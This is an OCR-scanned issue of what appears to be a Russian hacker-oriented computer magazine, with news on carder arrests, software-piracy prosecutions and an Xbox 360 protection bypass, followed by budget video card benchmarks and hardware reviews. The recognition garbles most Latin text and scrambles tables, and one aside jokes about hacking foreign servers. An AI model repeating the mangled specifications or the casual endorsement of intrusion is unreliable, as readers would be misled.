Поймать кардеров — дело нелегкое, тем 
более, если они осторожничают. Но в прошлом 
месяце наша доблестная милиция доказала, 
что для них нет ничего невозможного. Аресто- 
ванными кардерами стала четверка студентов 
финансового факультета одного из столичных 
вузов. Парни уже давно раздумывали, как бы 
разжиться баблишком побыстрее, побольше 
и без особого труда. И тут удача подвалила: 
познакомились в Интернете с американскими 
«коллегами», которые имели доступ к инфор- 
мации о кредитках буржуев. Все, что нужно 
было сделать, — изготовить поддельные креды 
и обналичить доллары в банкоматах. Добычу 
делили по-братски. Сказано — сделано. По- 
лучив нужные данные и изготовив кредитные 
карты, студенты воспользовались десятью 
банкоматами и за несколько месяцев сняли до 
500 тысяч баксов. Когда жертвы обнаружили 
пропажу, пожаловались в американскую поли- 
цию, а та, узнав, куда уте кп о бабло, связалась 
с нашим УБЭПом. Органы довольно быстро 
определили, с каких банкоматов шла обналич- 
ка и, установив за ними наблюдение, аресто- 
вали кардеров во время очередной их попытки 
снять сливки. После того как на штаб-квартире 
студентов нашли более чем достаточно улик 
(65 тысяч зелени, дампы, фальшивые креды 
и оборудование по их изготовлению, инфа о 
счетах), парни долго не ломались и выдали 
своих сообщников. Сейчас американскими 
поставщиками занимается ІІЗА Роіісе, а 
русским горе-кардерам остается только 
сушить сухари. Сидеть им, судя по всему, 
придется долго. 



Директор, ставь лицензию 
и спи спокойно 

Не повезло генеральному директору ООО «МПарк Телеком» Ивану Гала- 
ничеву. В Москве — несметное количество фирм, где лицензию в упор не 
признают, а поймали его. О том, что только на 8-ми компьютерах из 13-ти, 
задействованных в фирме, стоит лицензионный ѴѴіпбоѵѵз, стало известно 
еще в ноябре 2005-го года, в результате проведенного на офис рейда. Уго- 
ловное дело по статье 146 «Нарушение авторских прав» было возбуждено в 
январе, а приговор объявлен в мае. Суд постановил шефу выплатить 30 тысяч 
рублей государству и 1 46 тысяч — компании МісгозоІІ. И это не единственный 
прецедент: судебных дел по 146-й статье в последнее время становится все 
больше. Милиция как-то сдружилась с обладателями прав и активно им помогает. 
По этой статье, кстати, предусмотрен не только штраф и принудительные работы, 
но и срок до 2-х лет. Правда, в тюрьму за это не сажали, но все идет к тому. Мне 
даже страшно подумать, что могут найти милиционеры, если проведут совместный 
с ФБР рейд на мой компьютер. 



Русские ученые против зарубежного ПО 

Уж не знаю, чем не угодили нашим ученым американские 
программеры, но месяц назад они скооперировались и 
написали президенту РФ Владимиру Путину официальное 
обращение. В нем они выразили беспокойство по поводу 
нынешнего состояния информационной безопасности в 
России и предложили во всех критических системах отка- 
заться от использования зарубежного ПО, а вместо этого 
писать софт для себя самостоятельно. Подписали бумагу 
члены РАЕН, сотрудники нескольких ведущих институтов, 
отдельные депутаты и другие ученые мужи. В качестве 
аргумента был приведен тот факт, что из-за купленного у 
буржуев софта практически вся информационная систе- 
ма страны находится под контролем иностранных структур. 
К тому же вместо того, чтобы поддержать, как говорится, 
отечественного производителя, правительство отдает дань 
американским магнатам. С одной стороны, составители 
обращения по-своему правы, но с другой — многие про- 
граммные пакеты не имеют аналогов в России, и их замена 
потребует кучи времени и средств. В общем, остается 
только гадать, как Владимир Владимирович отреагирует 
на послание. А пока ты можешь почитать текст обращения 
здесь: ѵѵѵѵѵѵ.спеѵѵз.ги/сІоѵѵпІоасІз/огЬазИ.сІос 
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(НОВОЕ ЗДАНИЕ! 
С ПАРКОВКѲЙГ^ 



КОМПЬЮТЕРНЫЙ ЦЕНТР 

«САВЕЛОВСКИЙ» 

- компьютеры и комплектующие 

- аудио и видео 

- бытовая техника 

- фотоаппаратура 

- мобильные телефоны 

- товары для спорта и отдыха 

Широкий выбор 
Доступные цены 

Возможность досуга для всей семьи 



і в нелелю! 
по адрес/.* 



I 



л. Сушееек* 
минут от м. 



5 месяцев и 40 тысяч за троян 

Нехилое наказание впаяли 34-летнему админу министерства 
образования в американском штате Вирджиния за установ- 
ку трояна на компьютер шефа. Чуваку придется провести 
5 месяцев в тюрьме, потом еще 5 под домашним арестом, 
потом еще 3 года мотать условно, да еще и выложить штраф 
в размере 40 тысяч у.е. Суть в том, что дело его проходило 
в рамках недавно принятой программы «нулевой терпимос- 
ти», предусматривающей серьезное наказание за любое 
незаконное вторжение в правительственные компьютеры. 

А ведь Кеннет Квак даже не пытался использовать полу- 
ченную инфу для наживы — просто читал время от времени 
письма босса, обсуждал с коллегами его переписку. Думаю, 
в тюрьме он осознает, что должность отвечающего за ІТ -бе- 
зопасность на фирме заключается немного не в этом. Благо 
времени на размышления будет предостаточно. 
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ХЬох 360 НаскесІ 

Г од назад Місгозоіі презентовала миру свою новую игровую приставку ХЬох 
360 на трехъядерном процессоре РоѵѵегРС, с 51 2 Мб ОРАМ, 20 Г иговым 
РЮО и другими наворотами. Понятное дело, компания приложила все 
усилия, чтобы не допустить расцвета пиратства на этой консоли, снабдив 
новинку непробиваемой защитой. И вот месяц назад в Интернете впервые 
появилось известие, что ХЬох хакнут. Умелец с сайта ХЬохНаскег.пеІ некий 
СоттосІоге4еѵа, выложил инструкцию с изощренным способом обойти 
защиту. Те, ктождетхелпавдухе «нажми кнопку и получи результат», могут 
расслабиться — придется покопаться в прошивке бокса, и далеко не факт, 
что после этого система вообще будет нормально грузиться. Но если все 
сделать правильно, то ты сможешь загружать не только лицензионные диски, 
но и болванки с копиями консольных шутеров. Найти рекомендации хакера 
можно по этой ссылке: ѵѵѵѵѵѵ.хЬохЬаскег.пе1/іпЬех.рЬр?ор1іоп=сот зті&ІІеті 
с!=33&1оріс=779.0 







АІѴЮ Зетргоп 3000+ 
АІѴЮ Зетргоп 3100+ 
АІѴЮ Зетргоп 3300+ 
АІѴЮ Зетргоп 3400+ 
АІѴЮ АіИІоп 64 3000+ 
АІѴЮ АіИІоп 64 3500+ 
АК/Ю АІЫоп 64 Х2 3800+ 
АІѴЮ АіЫоп 64 Х2 4200+ 
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Тестовый стенд 

Процессор, МГ ц: 2420, АІѴЮ АіЫоп 64 3500+ 
Материнская плата: Віозіаг ТРогсе 6100-939 
(ІЧѴЮІА ОеРогсе 6100) 

Память, Мб: 2x512 Согзаіг ООВ400 012,5 
Кулер: ѲІасіаІТесб Ідіоо 7200 Рго 
Жесткий диск, Гб: 2x80, Зеадаіе 7200грт 
Блок питания, Вт: 520, РоѵѵегМап Раѵоигііе 

" :і и 



Тестирование І_о\л/-Епа видеокарт 



ВИДЮХА ЗА $1 К, ВОДЯНОЕ ОХЛАЖДЕНИЕ, ГИГАБАЙТ ВИДЕОПАМЯТИ - ЭТО 
ВСЕ ОЧЕНЬ КРУТО, СОГЛАСИСЬ. НО МЫ С ТОБОЙ СОВСЕМ НЕ ПОХОЖИ 
НА ЭТИХ ДЕРНУТЫХ ГЕЙМЕРОВ, ГОТОВЫХ УДАВИТЬСЯ ЗА КАЖДЫЙ РРЗ 
В ИГРАХ. МЫ ПОЛУЧАЕМ УДОВОЛЬСТВИЕ ОТ ДРУГИХ ВЕЩЕЙ. 



. 

Действительно, играть сутки напролет в тяжеловесные игры, 
это не для нас с тобой. Чтобы поиграть в контру в локалке, 
посмотреть 0\Ю, поломать буржуйские сервера, покодить в 
ѴізиаІ Зіисііо и поизучать ІІпіх совершенно не нужна Ы- 
епсі видеокарта с килограмовым радиатором и пропеллером 
от ИЛ-62. Оптимальным выбором может стать недорогая 
видяшка, которую дядьки с іхЫ причислят к классу І_оѵѵ- 
ЕпсІ. Ну и бог с ними - зато она будет стоить дешевле 
ста баксов и будет полностью покрывать все наши нужны. 
Именно таким видеокартам мы и решили посвятить 
нынешний материал, а заодно узнать, насколько хорошо они 
способны справиться с сегодняшними играми, и можно ли их 
порекомендовать такому крутому хакеру, как ты. 



МЕТОДИКА ТЕСТИРОВАНИЯ 

Для тестирования видеокарт мы использовали стандартный 
набор игр и бенчмарков: ЗйМагк’ОЗ и 05, Ооогті 3, Раг Сгу и 
НаІМ_іІе 2 как отражение картины с сегодняшними игровыми 
приложениями, а также ІІпгеаІ Тоигпатепі 2004 в качестве 
примера игры двухлетней давности. В играх выставлялась 
максимальная детализация, тесты прогонялись в разрешениях 
800x600, 1024x768 и 1280x1024. Прекрасно понимая, что на 
платах такого уровня сглаживание и анизотропия практически 
не востребованы (разве что в старых играх), эти режимы в 
процессе эксперимента мы не использовали. 
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РЕВРЮМ 




РѴІ. Р-ЗиЬ. 5-ѴісІео 



аналогами. 
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А 311 5 

ЕАХІЗООРНО 
Зііепі 
(4 балла) 



Заррпіге 
Пасіеоп 
XI 300 
(4 балла) 



РоѵѵегСоІог 
Пасіеоп 
XI 300 
(4 балла) 



Ялоо: АТІ НѴ515 Ялоо: АТІ ЯѴ515 Яд ф : АТІ НѴ515 * 

'^ Количество пиксельных конвейеров, Количество пиксельных конвейеров. Количество пиксельных конвейеров, 



1шт: 4 

Шина памяти, бит: 128 



: ' Объем памяти, Мб: 256 



’ - Частота ядра, МГ и: 600 

Частота памяти, МГц: 400 (800) 
I ^ Тип памяти: РРН2 

Выходы: РѴІ, Р-5иЬ, 5-Ѵібео 



шт: 4 

Шина памяти, бит: 128 
Объем памяти, Мб: 256 
Частота ядра, МГ и: 450 
Частота памяти, МГц: 256,5 (513) 
Тип памяти: РРВ2 
Вы> 



шт: 4 

Шина памяти, бит: 128 
Объем памяти, Мб: 256 
Частота ядра, МГц: 445,5 
Частота памяти, МГц: 247,5 (495) 
Тип памяти: РОВ2 
Выходы: 2хР-5иЬ, 5-Ѵібео 



118$ 



Плата поставляется в большой и 



довольно симпатичной упаковке, 
в которой, кроме самого девай- 
са, можно обнаружить мануал, 
драйвера, уйму разнообразного 
фирменного софта Азиз, демо- 
версию игры Кіпд-Копд и пару 
переходников. Сама плата — 
настоящая находка для любите- 
лей тишины и интересных тех- 
нических инноваций! Во-первых, 
как чипсет, так и модули памяти 
были перепаяны на обратную 
сторону РСВ — благодаря этому 
инженеры легко смогли решить 
проблему потери близлежащего 
РСІ-слота. Во-вторых, получив 



Видеокарта обладает бога- 
тейшей комплектацией. Одних 
только кабелей и переходников 
тут пять наименований, кроме 
того, имеется небольшой ману- 
ал, драйвера, утилита ТгіХХ для 
удобного разгона видеокарты, 
плеер СуЬегЫпк РоѵѵегЭѴЭ и 
двухслойный ЭѴЭ с набором игр 
Заррітіге ЗеІесГ Последний пред- 
ставляет собой комплект полных 



версий игр с ограничением по 
времени — любую понравившу- 



юся ты можешь активировать с 



помощью прилагаемого кода. 
Что касается самой платы, то 



в свое распоряжение все про- 



странство сверху видеокарты, 
эти же ребята установили на 
чипсет полностью пассивную 
двухмодульную систему охлаж- 
дения. Модули соединены между 
собой тепловой трубкой, а верх- 
ний свободно вращается отно- 
сительно нижнего на 90 граду- 
сов. Таким образом, раскрыв 
этот радиатор, подобно книге, 



она собрана на базе чипа АТІ 
НѴ515 обычной (не РРЮ) версии, 
так что производительность ее 
в играх находится на среднем 
уровне. Тем не менее, функци- 
ональность довольно неплоха: 
есть и поддержка Збасіег МобеІ 
3.0, и АѴІѴО — технология, 



ты попросту превращаешь его 
в активную систему, причем в 
качестве вентилятора выступит 
твой процессорный кулер! 



направленная на улучшение 
качества обработки видео. И 
чип, и модуль памяти (только 
расположенные на лицевой сто- 
роне РСВ) остывают при помо- 



щи пассивного охлаждения. 



НІ8 ЕхсамЬиг 
XI 300 ІсеО 
(4 балла) 



Ядро: АТІ РѴ515 ' 

Количество пиксельных конвейеров, 
шт: 4 Н 

Шина памяти, бит: 128 
Объем памяти, Мб: 256 
Частота ядра, МГц: 452 
Частота памяти, МГц: 256,5 (513) 

Тип памяти: РРН2 
Выходы: РѴІ, Р-ЗиЬ, З-Ѵібео 
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Большинство бюджетных виде- 
окарт не выделяются комплек- 
тацией — это доказывает и при- 
мер данного девайса. В неболь- 
шой, довольно симпатичной 
коробке удается обнаружить 
только лишь СО с драйверами, 
кабель 5-ѴісІео/НСА, переходник 
ОѴІ/О-ЗиЬ и тоненький мануал 
по установке. 

Традиционно установлены 256 
Мб памяти ООР2, правда, с 
небольшим отличием от ана- 
логов. Модули произведены не 
ІпТіпеоп , как в большинстве слу- 
чаев, а Нупіх, и их латентность 
составляет 2,5 нс против 2,8 
на аналогичных платах ЗаррИіге 
и НІЗ. Проще говоря, данная 
память обычно используется 
на РРО, но никак не на обыч- 
ных версиях плат АТІ Пасіеоп 
XI 300! Номинальная частота их 
должна составлять около 800 
МГц, так что, как минимум, стоит 
рассчитывать на неплохой раз- 
гонный потенциал! Оверклок, 



Система охлаждения ІсеО давно 
уже стала лицом компании НІЗ, 
принесшим ей немалую попу- 
лярность у любителей разго- 
на. Это мощное двухслотовое 
решение обеспечивает отлич- 
ное охлаждение графического 
процессора, но главное то, что 
оно не является прерогативой 
только топовых видеокарт! Вот, 
скажем, у этой относитель- 
но недорогой модели на базе 
АТІ Пасіеоп XI 300 (НѴ515) мы 
видим именно систему охлажде- 
ния ІсеО — самое время овер- 
клокерам узнать, на что спосо- 
бен данный чипсет в условиях 
такой заботы! Вот только память 



кстати говоря, не помешает еще 



и потому, что частоты по умол- 
чанию у этой модели чуть зани- 
жены в сравнении все с теми же 



жалко — она практически не 
охлаждается этим «монстром». 
За исключением охлаждения 
данная плата представляет 
собой полную копию ЗаррИіге 
Пасіеоп XI 300 — те же модули 
памяти ЭЭП2 ІпГпеоп 2,8 нс в 
количестве 256 Мб, та же шина, 
толщиной 128 бит, те же рабо- 
чие частоты. Комплектация 
вполне на уровне: есть и кабе- 
ли с переходниками, и софт, и 
демо-версии игр на отдельном 
ЭѴО-диске. 
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Ядрб: ІМѴЮІА ЫѴ44 



Количество пиксельных конвейеров. 



Ядро: ІМѴЮІА 072 



Ядро: ЫѴЮІА ЫѴ43 ■ 



шт: 4 

1 | - 
Шина памяти, бит: 64 



Количество пиксельных конвейеров^ » 



Количество пиксельных конвейеров. 



шт: 4 • 

Шина памяти, бит: 64 



Объем памяти. Мб: 256 



Ядро: ЫѴІРІА 072 



шт: 8 

и Шина памяти, бит: 128 



Частота ядр< 



Количество пиксельных 



конвейеров. 



Объем памяти. Мб: 256 



Частота памяти, МГц: 200 (400) 



Объем памяти, Мб: 256 



шт: 4 

Шина памяти, бит: 64 



Частота ядра. МГц: 602 



Тип памяти: РРВ1 



Частота ядра, МГц: 300 



Частота памяти. МГц: 405 (810) 



Выходы: РѴІ, Р-5иЬ, 5-Ѵібео 



Частота памяти, МГц: 250,5 (501") 



Объем памяти, Мб: 128 



Тип памяти: РРВ2 



Тип памяти: РРРИ 



Частота ядра, МГц: 551 



Выходы: РѴІ. Р-Зиб. 5-Ѵібео 



Частота памяти, МГц: 405 (810) 



Ъ-ЗиЬ. 5-ѴісІео 



Выходы: 



Тип памяти: РРВ2 



Выходы: РѴІ, Р-5иЬ, 5-Ѵібео 



ч, 

СИаіпІесИ 
СеГогсе 
7300С8 
(4 балла) 



СНаіпІесІі І_еасІІек 

СеРогсе 6500 ѴѴіпРазІ 
(3 балла) РХ7300С8 



АОреп Аеоіиз 

РСХ6600- 

РѴ256 



Еще один представитель пре- 
дыдущего поколения чипсетов 
ІМѴЮІА (первой была СИаіпІесІі 
(ЗеЕогсе 6500). У этой же платы 
все более “серьезно”: чип-ЫѴ43 



та же миниатюрная упаковка, Миниатюрная коробка, в кото- 
скромная комплектация в виде рой лежит крошечная видеокар- 
кабеля и драйверов, правда, та, диск с драйверами, кабель этот раз на кусочке текстолита с восемью, пиксельными кон- 
плата выглядит значительно З-Ѵібео и тонюсенький мануал. расположились современные вейерами, 256 Мб памяти ООР1 
внушительнее предшественни- Сама плата тоже не отстает от компоненты: чип (372 и 128 Мб и 128-битная шина выгодно ста- 
цы. Текстолит использован пол- общей картины: на небольшом памяти ООР2 от ІпТіпеоп. Мало вят ее даже в сравнении с более 
норазмерный, все разъемы на куске текстолита тесно разме- памяти? Не беда, технология совершенным ІМѴЮІА СеРогсе 
месте и никаких тебе шлейфов! щаются чипсет ІМѴ44, модули ІМѴЮІА ТигЬоСасІіе позволя- 7300С 5. И пусть модули памяти 
Но это мелочи, а что касает- памяти Ѵйаіа типа ООН 1 (общее ет динамически расширять ее выполнены в устаревшей ТЗОР- 
ся основных характеристик, то количество составляет 128 Мб) объем до 256 Мб за счет твоей упаковке, "не способствующей 
они представлены завышен- и всего один йѴІ-разъем (О-ЗиЬ оперативки — эффективность, хорошему разгону — это с лих- 
ной относительно референса здесь подключен посредством конечно, уже не та, но ведь и эко- вой окупается тем, что они укры- 
частотой СРІІ, 256 Мб памяти шлейфа). 64-битная шина памя- номия на лицо. К тому же надо ты широкой пассивной систе- 
ООР2 в модулях Іпііпеоп 2,8 нс ти дополняет картину: произво- отдать инженерам должное — мой охлаждения данной платы, 
и ее шиной, шириной 64 бита, дительность платы очень низка работает эта технология непло- Да-да, эта система не содержит 
Именно последняя, кстати, и во всех режимах и хватает ее хо, и плата лишь едва отстает никаких деталей, кроме радиа- 
губит производительность плат только лишь для старых игр от полноценных 256-мегабай- тора, так что о шуме р (по край- 
на базе (ЗеРогсе 7300(33 в орав- вроде ІІпгеаІ Тоигпатепі 2004. тных аналогов. Вот только с ней мере, издаваемом видео- 
нении с конкурирующим АТІ Небольшой кулер, установ- АТІ Вабеоп Х1300РРЮ тягаться картой) можно будет смело 
Рабеоп ХІЗООРРО — эти реше- ленный на чипе, со своей ей сложновато — узкая шина забыть. Впрочем, есть и одно 
ния работают на более “толстой” задачей справляется вполне памяти не дает по-настоящему 1 «но»: дотронувшись до системы 
128-битной шине. Если же орав- сносно — здесь хватило бы и раскрыться, и плата догоняет охлаждения во время работы, мы 
нивать экземпляр от Сілаіпіеоіп обычного радиатора. Тем не соперника разве что в Оооіті 3. обнаружили, что работает она на 
с другими платами на базе менее, для разгона его воз- Что касается комплекта- износ. Нагрев был так силен; что 
(372 в нашем тесте, то за счет можностей вряд ли хватит, да ции, то жаловаться на что- легко можно было обжечься, при 
повышенных частот именно эта и память в ТЗОР-упаковке не либо, равно как и радовать- этом датчики показывали, что 
плата стала наиболее быстрой очень к этому располагает, ся, мы не можем — обычный температура (ЗР11 перевалила 

набор бюджетной видеокарты: за 70 градусов — дополнитель- 

мануал, кабели и драйвера, ный обдув явно не помешает :). 






РЕПВІІМ 



ЗОМагк 2005 



ЗРМагк 2003 



Аореп Аеоіиз РСХббОООТ-ОѴО 1 28 X Ігете 
Аореп Аеоіиз РСХ6600ѲТЮШ286 
МЗІ МХ7300О5-ТО256Е 
АІЬаІгоп ОеРогсе 730003 1 28 
ЬеасІІек ѴѴІпРазІ РХ730003 ЮН 
СЬаіІесЬ ОеРогсе 730003 
СЬаіІесЬ ОеРогсе 6500 

ОідаЬуІ Васіеоп XI ЗООРВО (ОѴ-ЯХ1 ЗР2560Е-ЯН) 

НІЗ ЕхсаІІЬиг X 1300 ІсеО 

РоѵѵегСоІог Васіеоп XI 300 

ЗаррЬіг Васіеоп XI 300 

Азиз ЕАХ1 ЗООРВО ЗІІепІ 



-[ 




-[ 



- I I 

I I 

О 500 1000 1500 2000 2500 3000 3500 4000 

Картина идентична ЗРМагк’ОЗ, 
правда, в этот раз платы на АТІ 
Васіеоп XI 300 обошли ЫѴЮІА 
СеГогсе 7300С5. 



Аореп Аеоіиз РСХббОООТ-ОѴОІ 28 X Ігете 
Аореп Аеоіиз РСХ6600ОТ-ОѴО256 
МЗІ ІЧХ730003-ТО256Е 
АІЬаІгоп ОеРогсе 730003 1 28 
ЬеасІІек ѴѴІпРазІ РХ7300СЗТОН 
СЬаіІесЬ ОеРогсе 730003 
СЬаіІесЬ ОеРогсе 6500 

ОідаЬуІ Васіеоп XI ЗООРВО (0Ѵ-ВХ13Р2560Е-ВН) 

НІЗ ЕхсаІІЬиг X 1 300 ІсеО 

РоѵѵегСоІог Васіеоп XI 300 

ЗаррЬіг Васіеоп XI 300 

Азиз ЕАХ1 ЗООРВО ЗІІепІ 




С АТІ Васіеоп XI ЗООРВО конкуриро- 
вать не может практически никто. 



□ НаІМіТе 2 1280x1024 

■ НаІМіТе 2 1024x768 

■ НаІМіТе 2 800x600 



□ РагСгу 1280x1024 

■ РагСгу 1024x768 

■ РагСгу 800x600 



Наіі-Ыіе 2 



Аореп Аеоіиз РСХ66000ТТОѴ01 28 X Ігете 
Аореп Аеоіиз РСХ6600ОТ-ОѴО256 
М5І ІМХ730003-ТО256Е 
АІЬаІгоп ОеРогсе 730003 1 28 
ЬеасІІек ѴѴІпРазІ РХ730003 ТОН 
СЬаіІесЬ ОеРогсе 730003 
СЬаіІесЬ ОеРогсе 6500 

ОідаЬуІ Расіеоп ХІЗООРРО (0Ѵ-РХ13Р2560Е-РН) 

НІЗ ЕхсаІІЬиг X 1300 ІсеО 

РоѵѵегСоІог Расіеоп XI 300 

ЗаррЬіг Расіеоп Х1300 

Азиз ЕАХ 1 3ООРРО ЗІІепІ 




Гаг Сгу 



Аореп Аеоіиз РСХ66000ТТОѴ01 28 X Ігете 
Аореп Аеоіиз РСХ6600ОТ-ОѴО256 
МЗІ ЫХ730003-ТО256Е 
АІЬаІгоп ОеРогсе 730003 1 28 
ЬеасІІек ѴѴІпРазІ РХ730003 ТОН 
СЬаіІесЬ ОеРогсе 730003 
СЬаіІесЬ ОеРогсе 6500 

ОідаЬуІ Расіеоп ХІЗООРРО (0Ѵ-РХ13Р2560Е-РН) 

НІЗ ЕхсаІІЬиг X 1300 ІсеО 

РоѵѵегСоІог Расіеоп XI 300 

ЗаррЬіг Расіеоп Х1300 

Азиз ЕАХ 1 3ООРРО ЗІІепІ 




I 

150 



Победа, разумеется, за внеконкурсным АОреп Аеоіиз РСХ6600СТ-0\Ш1 28. 
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ВСЕ ВОЗМОЖНОСТИ 
ДЛЯ ОТДЫХА 
И РАЗВЛЕЧЕНИЙ 



Используя новейший двухъядерный процессор Іпіеі® Репііит® О 
персональный компьютер ФРОНТ Т-90 (404) предоставляет Вам больше 
вычислительных ресурсов, позволяя по-настоящему насладиться всеми 
достижениями новейших мультимедиа-программ. 




Репііит й 

іпзШё" 



ОиаІ-соге. 
Оо тоге. 





Ч>Р <г НТ 

ѵѵѵѵѵѵ.ігопірс.ги 
+ 7 ( 495 ) 234-9049 



технология 

повепы 



Обозначения ВиппуРеорІе, Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, логотип Сепігіпо, СНІрз, Соге Іпзісіе, Оіаіодіс, ЕІНегЕхргезз, ЕТОХ, РІазНРІІе, І386, І486, І960, ЮОМР, ІпзІапІІР, Іпіеі, логотип Іпіеі, ІпІеІ386, ІпІеІ486, ІпІеІ740, Іп1еЮХ2, Іп(еЮХ4, ІпІеІЗХ2, Іпіеі Соге, Іпіеі Іпзісіе, 
логотип Іпіеі Іпзісіе, Іпіеі. Ьеар аНеасІ., логотип Іпіеі. Ьеар аНеасІ., Іпіеі ЫеІВигзІ, Іпіеі ІЧеІМегде, Іпіеі МеІЗІгисІиге, Іпіеі ЗіпдІеОгіѵег, Іпіеі ЗреебЗІер, Іпіеі ЗІгаІаРІазН, Іпіеі Ѵііѵ, Іпіеі ХЗсаІе, ІРЫпк, Ііапіит, Ііапіит Іпзісіе, МСЗ, ММХ, логотип ММХ, логотип Оріітігег, 
ОѵегОгіѵе, Рагадоп, РОСНагт, Репііит, Репііит II Хеоп, Репііит III Хеоп, Регіогтапсе аі Ѵоиг Соттапб, Репііит Іпзісіе, зкоооі, ЗоипсІ Магк, ТНе Сотриіег Іпзісіе., ТЬе Зоигпеу Іпзісіе, ѴТипе, Хеоп и Хеоп Іпзісіе являются товарными знаками, либо зарегистрированными 
товарными знаками, права на которые принадлежат корпорации Іпіеі или ее подразделениям на территории США и других стран. 





* основных причин, почему они попали в наш обзор 




19-дюймовый жидкокристаллический моник с крутыми мультимедий- 
ными возможностями и целой кучей интерфейсов. 



АСЕП А 1.1 932 



Разрешение: 


1280*1024 


Диагональ 


дюймов: 19 


Яркость 


кд/см л 2: 400 


Контрастность: 


500:1 


Латентность матрицы, мс: 


12 


Углы обзора (горизонтальные/ 
вертикальные, град): 


140/140 


Колонки: 


2x1 Вт 


Интерфейсы: 


0-ЗІІВ, ОУ\-0, 3-ѴЮЕО, 5САВТ, ВСА 


Размеры, мм: 


455.8 х 458.5 х 190.6 


Вес, кг: 


7,1 


Цена: 


$514 




Устройство оснащено разъ- 
емами О-ЗІІ В, Аибіо ^ск іп, 
5САРТ и ОѴІЮ. Последние 
два находятся под пылеза- 
щитной крышкой. 



Девайс, при помощи крепле- 
ния ѴЕЗА 100x100 мм, можно 
легко повесить на стену. Это 
позволит сэкономить места 
на рабочем столе. 




Время отклика пикселя не- 
большое: за движущимися 
предметами шлейфа не вид- 
но, поэтому смотреть филь- 
мы и играть в игры будет 
очень комфортно. 





ГО 


Моник имеет два встроенных 
динамика, каждый мощностью 
по 1 Вт. Не 7.1 система, конеч- 
но, но, если нет нормальной 
акустики, послушать можно. 







Производители заюзали но- 
вую технологию передачи 
изображения ТЫ+СгузіаІВгіІе, 
которая обеспечивает более 
качественую передачу цвета. 




В меню есть целая куча настро- 
ек, при помощи которых можно 
полностью кастомизировать 
устройство: настроить картинку 
так, как тебе хочется. 
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_1_ 


Северный мост АТІ РЮ580 оснащен актив- 
ной системой охлаждения, южный мост 11 и 
М1575 защищен радиатором. Кроме того, 
радиаторами закрыты все полевые тран- 
зисторы, входящие в состав стабилизатора 
напряжения материнской платы. 






2 


Ріа материнскую плату установлен индика- 
тор РОЗТ-кодов, поэтому причину возник- 
новения неполадок можно будет легко вы- 
яснить. 


к. 


ГО 


Слоты памяти окрашены в разные цвета, что- 
бы избежать ошибок при установке памяти для 
работы в двухканальном режиме. 


к. 




Кнопка включения и кнопка перезагрузки 
уже установлены на материнской плате, что 
очень удобно при сборке и тестировании 
системы. 






5 


В качестве аудиорешения установлен 8- 
канальный кодек Веаііек АІ_С882. Весьма 
достойный чип, которого тебе с головой 
хватит. 




Материнская плата для Зоскеі 939 процессоров, изготовленная с применени- 
ем набора логики АТІ РЮ580+ Ш М1575, поддерживающая СгоззРіге. 



РРІ І_апРаг*у ІІТ СРХ3200-ОК 

Процессор: ЗоскеШЗЭ, поддерживаются процессоры АМР АІІіІоп 64 Х2 / 



АІЫоп 64 РХ / АІІіІоп 64 / Зетргоп 



Чипсет: 


Северный мост: 


АТІ СгоззРіге СРХ3200 (АТІ РЮ580) 


Южный мост: 


Ш М1575 


Память: 


Четыре слота 184 ріп ООВ ЗОВАМ. Поддерживается 
двухканальный режим, максимальный объем памяти 4 Гб. 


Слоты расширения: 


2 - РСІ-Е х16 (поддерживается СгоззРіге), 2 - РСІ-Е хі , 3 
-РСІ 


Сетевые возможности: 


2 дідаЫі ЕІІпегпеІ 


ЮЕ, ЗегіаІ Аіа и ПАЮ: 


Четыре разъема 5АТА на базе южного моста Ш М1575. 
Поддерживаются ВАЮ 0, ВАЮ 1 , ВАЮ 0+1 и ЛЗОО. 
Четыре разъема 5АТА на базе контроллера ЗіІ 3114. 
Поддерживаются АЮ 0, ВАЮ 1 , ВАЮ 0+1 и ВАЮ 5. 

Два разъема ЮЕ. 


Цена: 


$200 




Ваш ПК способен успевать за 
Вашими потребностями. 

Компыёіер ‘ПйрВДйМн~ «а Ішв ДиухъндемчоГС) АрйцйМОра ШЙИЭ РеШіиГЛЕ» О 
гчкдостаемат Йлм максимум ресурсов для выполнения иногоэддаи^ых гчшломаиий 



(812) 703-10-50 сетевая интеграция, ноутбуки, 

(81 2) 325-25-05 рабочие станции и периферия 




* 



РегЛіипѴО 

(Л5і<*е'“ 






РЕВРШМ 




Мышь с биометрическим датчиком отпечатков пальцев, способная 
взять на себя функции КПП твоего ПК. 




Мышь оборудована специ- 
альным сенсорным датчиком 
АиіИепТес Ріпдегргіпі Неабег, 
который считывает отпечатки 
пальцев и позволяет использо- 
вать их для аутентификации. 



В комплекте поставки уст- 
ройства находится специ- 
альная софтина ОтпіРазз, 
которая обеспечивает био- 
метрическую защиту компа. 



2 

5 



Параноидально настроенным 
товарищам понравится воз- 
можность выбора различных 
алгоритмов для аутентифика- 
ции и защиты данных. 



После установки драйверов 
будет предложено проскани- 
ровать отпечатки твоих паль- 
цев, чтобы потом полученные 
данные могли использовать- 
ся в качестве паролей. 

Девайс стоит полсотни бак- 
сов. Полтос, — и твой комп 
оборудован современной 
биометрической защитой, 
которой можно хвастаться пе- 
ред приятелями. 



з 



Теперь можно забыть о долгих 
муках придумывания очередно- 
го пароля или о страхе за то, что 
кто-то узнает твой один-единс- 
твенный пароль, применяемый 
везде, где только можно. 



6 



Твои отпечатки пальцев можно 
использовтаь не только в качес- 
тве паролей, но и для шифрова- 
ния файлов и создания крипто- 
ванных разделов. 




МиІІі СагсШеасІег от йідта 

Модель: РСВ 31 Ц 



Число поддерживаемых форматов: 


31 


Поддерживаемые типы флеш-карт: 


СР, ЗМ/ХР, ЗР/ММС, М 3 


Интерфейс подключения: 


НідІі/РиІІ ЗреесІ 115 В 2 . 0 , 115 В 1 .1 


Габариты: 


103 x 62 x 16 мм 


Цена: 


$10 



Крутой мегаскоростной ІІЗВ-кардридер, поддерживающий прямое 
копирование данных с карты на карту. 




Четыре слота для установки 
карт памяти поддерживают 
подключение более тридцати 
разнообразных типов фле- 
шек всех возможных на дан- 
ный момент форматов. 



На прилагаемом к девайсу 
диске, помимо драйверов и 
мануалов, лежит мегаполез- 
ная софтина для низкоуровне- 
го форматирования флешек. 





Два индикатора сообщают о на- 
личии соединения с компьюте- 
ром и активном режиме работы 
(прием/передача данных). 



Интерфейс передачи данных 
построен на технологии ІІЗВ 
2.0 НіЗреесІ, что позволяет пе- 
регонять огромное количество 
информации с максимальной 
скоростью. 

Кроме операционной систе- 
мы ѴѴіпбоѵѵз, данное устройс- 
тво будет работать также и в 
МасОЗ. 






ГО 


Удобно, что со всеми поддержи- 
ваемыми форматами карт мож- 
но работать без спецадаптеров 
